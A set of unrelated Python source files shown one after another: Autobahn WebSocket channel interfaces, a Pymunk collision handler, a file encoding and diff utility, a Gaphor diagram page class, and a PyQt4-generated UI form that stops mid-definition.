## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
__all__ = ['IWebSocketChannel',
'IWebSocketChannelFrameApi',
'IWebSocketChannelStreamingApi']
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class IWebSocketChannel(object):
"""
A WebSocket channel is a bidirectional, full-duplex, ordered, reliable message channel
over a WebSocket connection as specified in RFC6455.
This interface defines a message-based API to WebSocket plus auxiliary hooks
and methods.
"""
@abc.abstractmethod
def onConnect(self, requestOrResponse):
"""
Callback fired during WebSocket opening handshake when a client connects (with
request from client) or when server connection established (with response from
server).
:param requestOrResponse: Connection request or response.
:type requestOrResponse: Instance of :class:`autobahn.websocket.protocol.ConnectionRequest`
or :class:`autobahn.websocket.protocol.ConnectionResponse`.
"""
@abc.abstractmethod
def onOpen(self):
"""
Callback fired when the initial WebSocket opening handshake was completed.
You now can send and receive WebSocket messages.
"""
@abc.abstractmethod
def sendMessage(self, payload, isBinary = False, fragmentSize = None, sync = False, doNotCompress = False):
"""
Send a WebSocket message.
You can send text or binary messages, and optionally specifiy a payload fragment size.
When the latter is given, the payload will be split up into WebSocket frames each with
payload length `<= fragmentSize`.
:param payload: The message payload.
:type payload: bytes
:param isBinary: `True` iff payload is binary, else the payload must be UTF-8 encoded text.
:type isBinary: bool
:param fragmentSize: Fragment message into WebSocket fragments of this size.
:type fragmentSize: int
:param sync: Iff `True`, try to force data onto the wire immediately. Note: do NOT use
this normally unless you know what you are doing. Performance likely will
suffer significantly. This feature is mainly here for use by Autobahn|Testsuite.
:type sync: bool
:param doNotCompress: Iff `True`, never compress this message. This only applies to
Hybi-Mode and only when WebSocket compression has been negotiated on
the WebSocket connection. Use when you know the payload
uncompressible (e.g. encrypted or already compressed).
:type doNotCompress: bool
"""
@abc.abstractmethod
def onMessage(self, payload, isBinary):
"""
Callback fired when a complete WebSocket message was received.
:param payload: Message payload (UTF-8 encoded text or binary). Can also be empty when
the WebSocket message contained no payload.
:type payload: bytes
:param isBinary: `True` iff payload is binary, else the payload is UTF-8 encoded text.
:type isBinary: bool
"""
@abc.abstractmethod
def sendClose(self, code = None, reason = None):
"""
Starts a WebSocket closing handshake tearing down the WebSocket connection.
:param code: An optional close status code (`1000` for normal close or `3000-4999` for
application specific close).
:type code: int
:param reason: An optional close reason (a string that when present, a status
code MUST also be present).
:type reason: str
"""
@abc.abstractmethod
def onClose(self, wasClean, code, reason):
"""
Callback fired when the WebSocket connection has been closed (WebSocket closing
handshake has been finished or the connection was closed uncleanly).
:param wasClean: True, iff the WebSocket connection was closed cleanly.
:type wasClean: bool
:param code: None or close status code (as sent by the WebSocket peer).
:type code: int
:param reason: None or close reason (as sent by the WebSocket peer).
:type reason: str
"""
@abc.abstractmethod
def sendPreparedMessage(self, preparedMsg):
"""
Send a message that was previously prepared with :func:`autobahn.websocket.protocol.WebSocketFactory.prepareMessage`.
:param prepareMessage: A previsouly prepared message.
:type prepareMessage: Instance of :class:`autobahn.websocket.protocol.PreparedMessage`.
"""
@abc.abstractmethod
def sendPing(self, payload = None):
"""
Send a WebSocket ping to the peer.
A peer is expected to pong back the payload a soon as "practical". When more than
one ping is outstanding at a peer, the peer may elect to respond only to the last ping.
:param payload: An (optional) arbitrary payload of length `<126` octets.
:type payload: bytes
"""
@abc.abstractmethod
def onPing(self, payload):
"""
Callback fired when a WebSocket ping was received. A default implementation responds
by sending a WebSocket pong.
:param payload: Payload of ping (when there was any). Can be arbitrary, up to `125` octets.
:type payload: bytes
"""
@abc.abstractmethod
def sendPong(self, payload = None):
"""
Send a WebSocket pong to the peer.
A WebSocket pong may be sent unsolicited. This serves as a unidirectional heartbeat.
A response to an unsolicited pong is "not expected".
:param payload: An (optional) arbitrary payload of length < 126 octets.
:type payload: bytes
"""
@abc.abstractmethod
def onPong(self, payload):
"""
Callback fired when a WebSocket pong was received. A default implementation does nothing.
:param payload: Payload of pong (when there was any). Can be arbitrary, up to 125 octets.
:type payload: bytes
"""
class IWebSocketChannelFrameApi(IWebSocketChannel):
"""
Frame-based API to a WebSocket channel.
"""
@abc.abstractmethod
def onMessageBegin(self, isBinary):
"""
Callback fired when receiving of a new WebSocket message has begun.
:param isBinary: `True` iff payload is binary, else the payload is UTF-8 encoded text.
:type isBinary: bool
"""
@abc.abstractmethod
def onMessageFrame(self, payload):
"""
Callback fired when a complete WebSocket message frame for a previously begun
WebSocket message has been received.
:param payload: Message frame payload (a list of chunks received).
:type payload: list of bytes
"""
@abc.abstractmethod
def onMessageEnd(self):
"""
Callback fired when a WebSocket message has been completely received (the last
WebSocket frame for that message has been received).
"""
@abc.abstractmethod
def beginMessage(self, isBinary = False, doNotCompress = False):
"""
Begin sending a new WebSocket message.
:param isBinary: `True` iff payload is binary, else the payload must be UTF-8 encoded text.
:type isBinary: bool
:param doNotCompress: Iff `True`, never compress this message. This only applies to
Hybi-Mode and only when WebSocket compression has been negotiated on
the WebSocket connection. Use when you know the payload
uncompressible (e.g. encrypted or already compressed).
:type doNotCompress: bool
"""
@abc.abstractmethod
def sendMessageFrame(self, payload, sync = False):
"""
When a message has been previously begun, send a complete message frame in one go.
:param payload: The message frame payload. When sending a text message, the payload must
be UTF-8 encoded already.
:type payload: bytes
:param sync: Iff `True`, try to force data onto the wire immediately. Note: do NOT use
this normally unless you know what you are doing. Performance likely will
suffer significantly. This feature is mainly here for use by Autobahn|Testsuite.
:type sync: bool
"""
@abc.abstractmethod
def endMessage(self):
"""
End a message previously begun message. No more frames may be sent (for that message).
You have to begin a new message before sending again.
"""
class IWebSocketChannelStreamingApi(IWebSocketChannelFrameApi):
"""
Streaming API to a WebSocket channel.
"""
@abc.abstractmethod
def onMessageFrameBegin(self, length):
"""
Callback fired when receiving a new message frame has begun.
A default implementation will prepare to buffer message frame data.
:param length: Payload length of message frame which is subsequently received.
:type length: int
"""
@abc.abstractmethod
def onMessageFrameData(self, payload):
"""
Callback fired when receiving data within a previously begun message frame.
A default implementation will buffer data for frame.
:param payload: Partial payload for message frame.
:type payload: bytes
"""
@abc.abstractmethod
def onMessageFrameEnd(self):
"""
Callback fired when a previously begun message frame has been completely received.
A default implementation will flatten the buffered frame data and
fire `onMessageFrame`.
"""
@abc.abstractmethod
def beginMessageFrame(self, length):
"""
Begin sending a new message frame.
:param length: Length of the frame which is to be started. Must be `>= 0` and `<= 2^63`.
:type length: int
"""
@abc.abstractmethod
def sendMessageFrameData(self, payload, sync = False):
"""
Send out data when within a message frame (message was begun, frame was begun).
Note that the frame is automatically ended when enough data has been sent.
In other words, there is no `endMessageFrame`, since you have begun the frame
specifying the frame length, which implicitly defined the frame end. This is different
from messages, which you begin *and* end explicitly , since a message can contain
an unlimited number of frames.
:param payload: Frame payload to send.
:type payload: bytes
:param sync: Iff `True`, try to force data onto the wire immediately. Note: do NOT use
this normally unless you know what you are doing. Performance likely will
suffer significantly. This feature is mainly here for use by Autobahn|Testsuite.
:type sync: bool
:returns: int -- When the currently sent message frame is still incomplete,
returns octets remaining to be sent. When the frame is complete,
returns `0`, when `< 0`, the amount of unconsumed data in payload
argument.
"""
|
<gh_stars>100-1000
__version__ = "$Id$"
__docformat__ = "reStructuredText"
import warnings
from typing import TYPE_CHECKING, Any, Callable, Dict, Optional
if TYPE_CHECKING:
from .space import Space
from ._chipmunk_cffi import ffi
from .arbiter import Arbiter
_CollisionCallbackBool = Callable[[Arbiter, "Space", Any], bool]
_CollisionCallbackNoReturn = Callable[[Arbiter, "Space", Any], None]
class CollisionHandler(object):
"""A collision handler is a set of 4 function callbacks for the different
collision events that Pymunk recognizes.
Collision callbacks are closely associated with Arbiter objects. You
should familiarize yourself with those as well.
Note #1: Shapes tagged as sensors (Shape.sensor == true) never generate
collisions that get processed, so collisions between sensors shapes and
other shapes will never call the post_solve() callback. They still
generate begin(), and separate() callbacks, and the pre_solve() callback
is also called every frame even though there is no collision response.
Note #2: pre_solve() callbacks are called before the sleeping algorithm
runs. If an object falls asleep, its post_solve() callback won't be
called until it's re-awoken.
"""
def __init__(self, _handler: Any, space: "Space") -> None:
"""Initialize a CollisionHandler object from the Chipmunk equivalent
struct and the Space.
.. note::
You should never need to create an instance of this class directly.
"""
self._handler = _handler
self._space = space
self._begin = None
self._begin_base: Optional[_CollisionCallbackBool] = None # For pickle
self._pre_solve = None
self._pre_solve_base: Optional[_CollisionCallbackBool] = None # For pickle
self._post_solve = None
self._post_solve_base: Optional[_CollisionCallbackNoReturn] = None # For pickle
self._separate = None
self._separate_base: Optional[_CollisionCallbackNoReturn] = None # For pickle
self._data: Dict[Any, Any] = {}
def _reset(self) -> None:
def allways_collide(arb: Arbiter, space: "Space", data: Any) -> bool:
return True
def do_nothing(arb: Arbiter, space: "Space", data: Any) -> None:
return
self.begin = allways_collide
self.pre_solve = allways_collide
self.post_solve = do_nothing
self.separate = do_nothing
@property
def data(self) -> Dict[Any, Any]:
"""Data property that get passed on into the
callbacks.
data is a dictionary and you can not replace it, only fill it with data.
Usefull if the callback needs some extra data to perform its function.
"""
return self._data
def _set_begin(self, func: Callable[[Arbiter, "Space", Any], bool]) -> None:
@ffi.callback("cpCollisionBeginFunc")
def cf(_arb: ffi.CData, _space: ffi.CData, _: ffi.CData) -> bool:
x = func(Arbiter(_arb, self._space), self._space, self._data)
if isinstance(x, bool):
return x
func_name = func.__code__.co_name
filename = func.__code__.co_filename
lineno = func.__code__.co_firstlineno
warnings.warn_explicit(
"Function '" + func_name + "' should return a bool to"
" indicate if the collision should be processed or not when"
" used as 'begin' or 'pre_solve' collision callback.",
UserWarning,
filename,
lineno,
func.__module__,
)
return True
self._begin = cf
self._begin_base = func
self._handler.beginFunc = cf
def _get_begin(self) -> Optional[_CollisionCallbackBool]:
return self._begin_base
begin = property(
_get_begin,
_set_begin,
doc="""Two shapes just started touching for the first time this step.
``func(arbiter, space, data) -> bool``
Return true from the callback to process the collision normally or
false to cause pymunk to ignore the collision entirely. If you return
false, the `pre_solve` and `post_solve` callbacks will never be run,
but you will still recieve a separate event when the shapes stop
overlapping.
""",
)
def _set_pre_solve(self, func: _CollisionCallbackBool) -> None:
@ffi.callback("cpCollisionPreSolveFunc")
def cf(_arb: ffi.CData, _space: ffi.CData, _: ffi.CData) -> bool:
x = func(Arbiter(_arb, self._space), self._space, self._data)
if isinstance(x, int):
return x
func_name = func.__code__.co_name
filename = func.__code__.co_filename
lineno = func.__code__.co_firstlineno
warnings.warn_explicit(
"Function '" + func_name + "' should return a bool to"
" indicate if the collision should be processed or not when"
" used as 'begin' or 'pre_solve' collision callback.",
UserWarning,
filename,
lineno,
func.__module__,
)
return True
self._pre_solve = cf
self._pre_solve_base = func
self._handler.preSolveFunc = cf
def _get_pre_solve(self) -> Optional[Callable[[Arbiter, "Space", Any], bool]]:
return self._pre_solve_base
pre_solve = property(
_get_pre_solve,
_set_pre_solve,
doc="""Two shapes are touching during this step.
``func(arbiter, space, data) -> bool``
Return false from the callback to make pymunk ignore the collision
this step or true to process it normally. Additionally, you may
override collision values using Arbiter.friction, Arbiter.elasticity
or Arbiter.surfaceVelocity to provide custom friction, elasticity,
or surface velocity values. See Arbiter for more info.
""",
)
def _set_post_solve(self, func: _CollisionCallbackNoReturn) -> None:
@ffi.callback("cpCollisionPostSolveFunc")
def cf(_arb: ffi.CData, _space: ffi.CData, _: ffi.CData) -> None:
func(Arbiter(_arb, self._space), self._space, self._data)
self._post_solve = cf
self._post_solve_base = func
self._handler.postSolveFunc = cf
def _get_post_solve(self) -> Optional[_CollisionCallbackNoReturn]:
return self._post_solve_base
post_solve = property(
_get_post_solve,
_set_post_solve,
doc="""Two shapes are touching and their collision response has been
processed.
``func(arbiter, space, data)``
You can retrieve the collision impulse or kinetic energy at this
time if you want to use it to calculate sound volumes or damage
amounts. See Arbiter for more info.
""",
)
def _set_separate(self, func: _CollisionCallbackNoReturn) -> None:
@ffi.callback("cpCollisionSeparateFunc")
def cf(_arb: ffi.CData, _space: ffi.CData, _: ffi.CData) -> None:
try:
# this try is needed since a separate callback will be called
# if a colliding object is removed, regardless if its in a
# step or not.
self._space._locked = True
func(Arbiter(_arb, self._space), self._space, self._data)
finally:
self._space._locked = False
self._separate = cf
self._separate_base = func
self._handler.separateFunc = cf
def _get_separate(self) -> Optional[_CollisionCallbackNoReturn]:
return self._separate_base
separate = property(
_get_separate,
_set_separate,
doc="""Two shapes have just stopped touching for the first time this
step.
``func(arbiter, space, data)``
To ensure that begin()/separate() are always called in balanced
pairs, it will also be called when removing a shape while its in
contact with something or when de-allocating the space.
""",
)
|
from pathlib import Path
from helios.text import Encoding
import chardet
import difflib
import re
from binaryornot.check import is_binary
_PATTERN_DIFF_LINE_INFO = re.compile(r"^@@[\x00-\x7f]*@@$")
_PATTERN_DIFF_LINE_LEFT = re.compile(r"^-[\x00-\x7f]*")
_PATTERN_DIFF_LINE_RIGHT = re.compile(r"^\+[\x00-\x7f]*")
class File:
def __init__(self, file_path):
super().__init__()
self._path = Path(file_path)
if not self._path.parent.exists():
self._path.parent.mkdir(parents=True, exist_ok=True)
self._path.touch()
self._encoding = None
self._is_text = None
@property
def full_path(self) -> str:
return str(self._path.resolve())
@property
def size(self) -> int:
return self._path.stat().st_size
@property
def is_text(self) -> bool:
if not self._is_text:
self._is_text = False if is_binary(self.full_path) else True
return self._is_text
@property
def encoding(self) -> Encoding:
if not self._encoding:
rawdata = self._path.read_bytes()
encoding = chardet.detect(rawdata)['encoding']
for e in Encoding:
if encoding == e.value:
self._encoding = e
return self._encoding
def cp(self, file_output: str):
output = File(file_output)
output._path.write_bytes(self._path.read_bytes())
return output
@property
def text(self) -> str:
if self.size == 0:
return ''
if self.encoding:
return self._path.read_text(self.encoding.value)
else:
return self._path.read_text(Encoding.UTF8.value)
# raise Exception('File.text Error', f'{self.full_path}')
# return self._path.read_bytes()
def convert(
self,
file_output: str,
encoding: Encoding = Encoding.UTF8):
output = File(file_output)
if self.encoding == Encoding.UTF8:
output._path.write_bytes(self._path.read_bytes())
else:
context = self._path.read_text(self.encoding.value)
output._path.write_text(context, Encoding.UTF8.value)
def diff(self, rhs) -> list:
text_lhs = self.text.splitlines()
text_rhs = rhs.text.splitlines()
diff_text = []
for line in difflib.unified_diff(
text_lhs,
text_rhs,
fromfile=self.full_path,
tofile=rhs.full_path
):
diff_text.append(line)
return diff_text
def diff_dict(self, rhs):
result_left = dict()
result_right = dict()
diff_lines = self.diff(rhs)
key = ''
text_left = None
text_right = None
for line in diff_lines:
if _PATTERN_DIFF_LINE_INFO.match(line):
if line != key:
if key != '' and text_left:
text_left = '\n'.join(text_left)
result_left[key] = text_left
text_right = '\n'.join(text_right)
result_right[key] = text_right
key = line.replace('\n', '')
text_left = list()
text_right = list()
result_left[key] = text_left
result_right[key] = text_right
else:
if key != '' and _PATTERN_DIFF_LINE_LEFT.match(line):
text_left.append(line)
if key != '' and _PATTERN_DIFF_LINE_RIGHT.match(line):
text_right.append(line)
return (result_left, result_right)
@staticmethod
def rm(file):
file._path.unlink()
|
import logging
from typing import Optional
import gaphas.segment # Just register the handlers in this module
from gaphas.freehand import FreeHandPainter
from gaphas.painter import (
BoundingBoxPainter,
FocusedItemPainter,
HandlePainter,
ItemPainter,
PainterChain,
ToolPainter,
)
from gaphas.tool import Tool
from gaphas.view import GtkView
from gi.repository import Gdk, GLib, Gtk
from gaphor import UML
from gaphor.core import action, event_handler, gettext, transactional
from gaphor.diagram.diagramtoolbox import TOOLBOX_ACTIONS
from gaphor.diagram.diagramtools import (
DefaultTool,
PlacementTool,
TransactionalToolChain,
)
from gaphor.diagram.event import DiagramItemPlaced
from gaphor.diagram.support import get_diagram_item
from gaphor.services.properties import PropertyChanged
from gaphor.transaction import Transaction
from gaphor.ui.actiongroup import create_action_group
from gaphor.ui.event import DiagramSelectionChanged
from gaphor.UML.event import ElementDeleted
log = logging.getLogger(__name__)
def tooliter(toolbox_actions):
"""
Iterate toolbox items, irregardless section headers
"""
for name, section in toolbox_actions:
yield from section
class DiagramPage:
VIEW_TARGET_STRING = 0
VIEW_TARGET_ELEMENT_ID = 1
VIEW_TARGET_TOOLBOX_ACTION = 2
VIEW_DND_TARGETS = [
Gtk.TargetEntry.new("gaphor/element-id", 0, VIEW_TARGET_ELEMENT_ID),
Gtk.TargetEntry.new("gaphor/toolbox-action", 0, VIEW_TARGET_TOOLBOX_ACTION),
]
def __init__(self, diagram, event_manager, element_factory, properties):
self.event_manager = event_manager
self.element_factory = element_factory
self.properties = properties
self.diagram = diagram
self.view: Optional[GtkView] = None
self.widget: Optional[Gtk.Widget] = None
self.event_manager.subscribe(self._on_element_delete)
self.event_manager.subscribe(self._on_sloppy_lines)
self.event_manager.subscribe(self._on_diagram_item_placed)
title = property(lambda s: s.diagram and s.diagram.name or gettext("<None>"))
def get_diagram(self):
return self.diagram
def get_view(self):
return self.view
def get_canvas(self):
return self.diagram.canvas
def construct(self):
"""
Create the widget.
Returns: the newly created widget.
"""
assert self.diagram
view = GtkView(canvas=self.diagram.canvas)
try:
view.set_css_name("diagramview")
except AttributeError:
pass # Gtk.Widget.set_css_name() is added in 3.20
view.drag_dest_set(
Gtk.DestDefaults.ALL,
DiagramPage.VIEW_DND_TARGETS,
Gdk.DragAction.MOVE | Gdk.DragAction.COPY | Gdk.DragAction.LINK,
)
scrolled_window = Gtk.ScrolledWindow()
scrolled_window.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
scrolled_window.add(view)
scrolled_window.show_all()
self.widget = scrolled_window
view.connect("focus-changed", self._on_view_selection_changed)
view.connect("selection-changed", self._on_view_selection_changed)
view.connect_after("key-press-event", self._on_key_press_event)
view.connect("drag-data-received", self._on_drag_data_received)
self.view = view
self.widget.action_group = create_action_group(self, "diagram")
shortcuts = self.get_toolbox_shortcuts()
def shortcut_action(widget, event):
action_name = shortcuts.get((event.keyval, event.state))
if action_name:
widget.get_toplevel().get_action_group("diagram").lookup_action(
"select-tool"
).change_state(GLib.Variant.new_string(action_name))
self.widget.connect("key-press-event", shortcut_action)
self._on_sloppy_lines()
self.select_tool("toolbox-pointer")
return self.widget
def get_tool(self, tool_name):
"""
Return a tool associated with an id (action name).
"""
if tool_name == "toolbox-pointer":
return DefaultTool(self.event_manager)
tool = next(t for t in tooliter(TOOLBOX_ACTIONS) if t.id == tool_name)
item_factory = tool.item_factory
handle_index = tool.handle_index
return PlacementTool(
self.view,
item_factory=item_factory,
event_manager=self.event_manager,
handle_index=handle_index,
)
def get_toolbox_shortcuts(self):
shortcuts = {}
# accelerator keys are lower case. Since we handle them in a key-press event
# handler, we'll need the upper-case versions as well in case Shift is pressed.
upper_offset = ord("A") - ord("a")
for title, items in TOOLBOX_ACTIONS:
for action_name, label, icon_name, shortcut, *rest in items:
if shortcut:
key, mod = Gtk.accelerator_parse(shortcut)
shortcuts[key, mod] = action_name
shortcuts[key + upper_offset, mod] = action_name
return shortcuts
@event_handler(ElementDeleted)
def _on_element_delete(self, event: ElementDeleted):
if event.element is self.diagram:
self.close()
@event_handler(PropertyChanged)
def _on_sloppy_lines(self, event: PropertyChanged = None):
if not event or event.key == "diagram.sloppiness":
self.set_drawing_style(event and event.new_value or 0.0)
def close(self):
"""
Tab is destroyed. Do the same thing that would
be done if Close was pressed.
"""
assert self.widget
self.widget.destroy()
self.event_manager.unsubscribe(self._on_element_delete)
self.event_manager.unsubscribe(self._on_sloppy_lines)
self.event_manager.unsubscribe(self._on_diagram_item_placed)
self.view = None
@action(
name="diagram.zoom-in", shortcut="<Primary>plus",
)
def zoom_in(self):
assert self.view
self.view.zoom(1.2)
@action(
name="diagram.zoom-out", shortcut="<Primary>minus",
)
def zoom_out(self):
assert self.view
self.view.zoom(1 / 1.2)
@action(
name="diagram.zoom-100", shortcut="<Primary>0",
)
def zoom_100(self):
assert self.view
zx = self.view.matrix[0]
self.view.zoom(1 / zx)
@action(
name="diagram.select-all", shortcut="<Primary>a",
)
def select_all(self):
assert self.view
self.view.select_all()
@action(name="diagram.unselect-all", shortcut="<Primary><Shift>a")
def unselect_all(self):
assert self.view
self.view.unselect_all()
@action(name="diagram.delete")
@transactional
def delete_selected_items(self):
assert self.view
items = self.view.selected_items
for i in list(items):
if isinstance(i, UML.Presentation):
i.unlink()
else:
if i.canvas:
i.canvas.remove(i)
@action(name="diagram.select-tool", state="toolbox-pointer")
def select_tool(self, tool_name: str):
tool = TransactionalToolChain(self.event_manager)
if self.view:
tool.append(self.get_tool(tool_name))
self.view.tool = tool
@event_handler(DiagramItemPlaced)
def _on_diagram_item_placed(self, event):
assert self.widget
if self.properties("reset-tool-after-create", True):
self.widget.action_group.actions.lookup_action("select-tool").activate(
GLib.Variant.new_string("toolbox-pointer")
)
def set_drawing_style(self, sloppiness=0.0):
"""
Set the drawing style for the diagram. 0.0 is straight,
2.0 is very sloppy. If the sloppiness is set to be anything
greater than 0.0, the FreeHandPainter instances will be used
for both the item painter and the box painter. Otherwise, by
default, the ItemPainter is used for the item and
BoundingBoxPainter for the box.
"""
assert self.view
view = self.view
if sloppiness:
item_painter = FreeHandPainter(ItemPainter(), sloppiness=sloppiness)
box_painter = FreeHandPainter(BoundingBoxPainter(), sloppiness=sloppiness)
else:
item_painter = ItemPainter()
box_painter = BoundingBoxPainter()
view.painter = (
PainterChain()
.append(item_painter)
.append(HandlePainter())
.append(FocusedItemPainter())
.append(ToolPainter())
)
view.bounding_box_painter = box_painter
view.queue_draw_refresh()
def may_remove_from_model(self, view):
"""
Check if there are items which will be deleted from the model
(when their last views are deleted). If so request user
confirmation before deletion.
"""
assert self.view
items = self.view.selected_items
last_in_model = [
i for i in items if i.subject and len(i.subject.presentation) == 1
]
log.debug("Last in model: %s" % str(last_in_model))
if last_in_model:
return self.confirm_deletion_of_items(last_in_model)
return True
def confirm_deletion_of_items(self, last_in_model):
"""
Request user confirmation on deleting the item from the model.
"""
assert self.widget
s = ""
for item in last_in_model:
s += "%s\n" % str(item)
dialog = Gtk.MessageDialog(
None,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
Gtk.MessageType.WARNING,
Gtk.ButtonsType.YES_NO,
"This will remove the following selected items from the model:\n%s\nAre you sure?"
% s,
)
dialog.set_transient_for(self.widget.get_toplevel())
value = dialog.run()
dialog.destroy()
if value == Gtk.ResponseType.YES:
return True
return False
def _on_key_press_event(self, view, event):
"""
Handle the 'Delete' key. This can not be handled directly (through
GTK's accelerators) since otherwise this key will confuse the text
edit stuff.
"""
if (
view.is_focus()
and event.keyval in (Gdk.KEY_Delete, Gdk.KEY_BackSpace)
and (
event.get_state() == 0 or event.get_state() & Gdk.ModifierType.MOD2_MASK
)
):
self.delete_selected_items()
def _on_view_selection_changed(self, view, selection_or_focus):
self.event_manager.handle(
DiagramSelectionChanged(view, view.focused_item, view.selected_items)
)
def _on_drag_data_received(self, view, context, x, y, data, info, time):
"""
Handle data dropped on the canvas.
"""
if (
data
and data.get_format() == 8
and info == DiagramPage.VIEW_TARGET_TOOLBOX_ACTION
):
tool = self.get_tool(data.get_data().decode())
tool.create_item((x, y))
context.finish(True, False, time)
elif (
data
and data.get_format() == 8
and info == DiagramPage.VIEW_TARGET_ELEMENT_ID
):
element_id = data.get_data().decode()
element = self.element_factory.lookup(element_id)
assert element
item_class = get_diagram_item(type(element))
if item_class:
with Transaction(self.event_manager):
item = self.diagram.create(item_class)
assert item
x, y = view.get_matrix_v2i(item).transform_point(x, y)
item.matrix.translate(x, y)
item.subject = element
view.unselect_all()
view.focused_item = item
else:
log.warning(
"No graphical representation for UML element %s"
% type(element).__name__
)
context.finish(True, False, time)
else:
context.finish(False, False, time)
|
<reponame>ssic7i/Slavs_time
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Users\sshejko.TIV\Dropbox\slav_time\slav_time_gui.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(200, 220)
Form.setMinimumSize(QtCore.QSize(200, 220))
Form.setMaximumSize(QtCore.QSize(200, 220))
Form.setBaseSize(QtCore.QSize(200, 220))
self.progressBar_h = QtGui.QProgressBar(Form)
self.progressBar_h.setGeometry(QtCore.QRect(110, 10, 118, 13))
self.progressBar_h.setMaximum(15)
self.progressBar_h.setProperty("value", 0)
self.progressBar_h.setFormat(_fromUtf8(""))
self.progressBar_h.setObjectName(_fromUtf8("progressBar_h"))
self.label = QtGui.QLabel(Form)
self.label.setGeometry(QtCore.QRect(10, 10, 46, 13))
self.label.setObjectName(_fromUtf8("label"))
self.label_2 = QtGui.QLabel(Form)
self.label_2.setGeometry(QtCore.QRect(10, 30, 46, 13))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.label_3 = QtGui.QLabel(Form)
self.label_3.setGeometry(QtCore.QRect(10, 50, 46, 13))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.label_h = QtGui.QLabel(Form)
self.label_h.setGeometry(QtCore.QRect(60, 10, 46, 13))
font = QtGui.QFont()
font.setKerning(True)
self.label_h.setFont(font)
self.label_h.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_h.setObjectName(_fromUtf8("label_h"))
self.label_c = QtGui.QLabel(Form)
self.label_c.setGeometry(QtCore.QRect(60, 30, 46, 13))
self.label_c.setObjectName(_fromUtf8("label_c"))
self.label_d = QtGui.QLabel(Form)
self.label_d.setGeometry(QtCore.QRect(60, 50, 46, 13))
self.label_d.setObjectName(_fromUtf8("label_d"))
self.progressBar_c = QtGui.QProgressBar(Form)
self.progressBar_c.setGeometry(QtCore.QRect(110, 30, 118, 13))
self.progressBar_c.setMaximum(143)
self.progressBar_c.setProperty("value", 0)
self.progressBar_c.setFormat(_fromUtf8(""))
self.progressBar_c.setObjectName(_fromUtf8("progressBar_c"))
self.progressBar_d = QtGui.QProgressBar(Form)
self.progressBar_d.setGeometry(QtCore.QRect(110, 50, 118, 13))
self.progressBar_d.setMaximum(1296)
self.progressBar_d.setProperty("value", 0)
self.progressBar_d.setFormat(_fromUtf8(""))
self.progressBar_d.setObjectName(_fromUtf8("progressBar_d"))
self.label_cur_time = QtGui.QLabel(Form)
self.label_cur_time.setGeometry(QtCore.QRect(10, 200, 201, 16))
self.label_cur_time.setObjectName(_fromUtf8("label_cur_time"))
self.label_hour_name = QtGui.QLabel(Form)
self.label_hour_name.setGeometry(QtCore.QRect(10, 70, 181, 16))
self.label_hour_name.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.label_hour_name.setFrameShape(QtGui.QFrame.NoFrame)
self.label_hour_name.setObjectName(_fromUtf8("label_hour_name"))
self.label_hour_descr = QtGui.QLabel(Form)
self.label_hour_descr.setGeometry(QtCore.QRect(10, 90, 181, 16))
self.label_hour_descr.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.label_hour_descr.setObjectName(_fromUtf8("label_hour_descr"))
self.label_hour_descr_2 = QtGui.QLabel(Form)
self.label_hour_descr_2.setGeometry(QtCore.QRect(10, 110, 101, 16))
self.label_hour_descr_2.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.label_hour_descr_2.setObjectName(_fromUtf8("label_hour_descr_2"))
self.label_hour_descr_3 = QtGui.QLabel(Form)
self.label_hour_descr_3.setGeometry(QtCore.QRect(10, 127, 111, 16))
self.label_hour_descr_3.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.label_hour_descr_3.setObjectName(_fromUtf8("label_hour_descr_3"))
self.label_hour_descr_4 = QtGui.QLabel(Form)
self.label_hour_descr_4.setGeometry(QtCore.QRect(10, 177, 111, 16))
self.label_hour_descr_4.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.label_hour_descr_4.setObjectName(_fromUtf8("label_hour_descr_4"))
self.label_round_years = QtGui.QLabel(Form)
self.label_round_years.setGeometry(QtCore.QRect(120, 110, 46, 16))
self.label_round_years.setObjectName(_fromUtf8("label_round_years"))
self.label_round_life = QtGui.QLabel(Form)
self.label_round_life.setGeometry(QtCore.QRect(120, 127, 46, 16))
self.label_round_life.setObjectName(_fromUtf8("label_round_life"))
self.label_cpsc = QtGui.QLabel(Form)
self.label_cpsc.setGeometry(QtCore.QRect(120, 177, 46, 16))
self.label_cpsc.setObjectName(_fromUtf8("label_cpsc"))
self.label_4 = QtGui.QLabel(Form)
self.label_4.setGeometry(QtCore.QRect(10, 145, 31, 16))
self.label_4.setObjectName(_fromUtf8("label_4"))
self.label_month = QtGui.QLabel(Form)
self.label_month.setGeometry(QtCore.QRect(50, 145, 61, 16))
self.label_month.setObjectName(_fromUtf8("label_month"))
self.label_5 = QtGui.QLabel(Form)
self.label_5.setGeometry(QtCore.QRect(120, 145, 31, 16))
self.label_5.setObjectName(_fromUtf8("label_5"))
self.label_date = QtGui.QLabel(Form)
self.label_date.setGeometry(QtCore.QRect(160, 145, 31, 16))
self.label_date.setObjectName(_fromUtf8("label_date"))
self.label_6 = QtGui.QLabel(Form)
self.label_6.setGeometry(QtCore.QRect(10, 162, 46, 13))
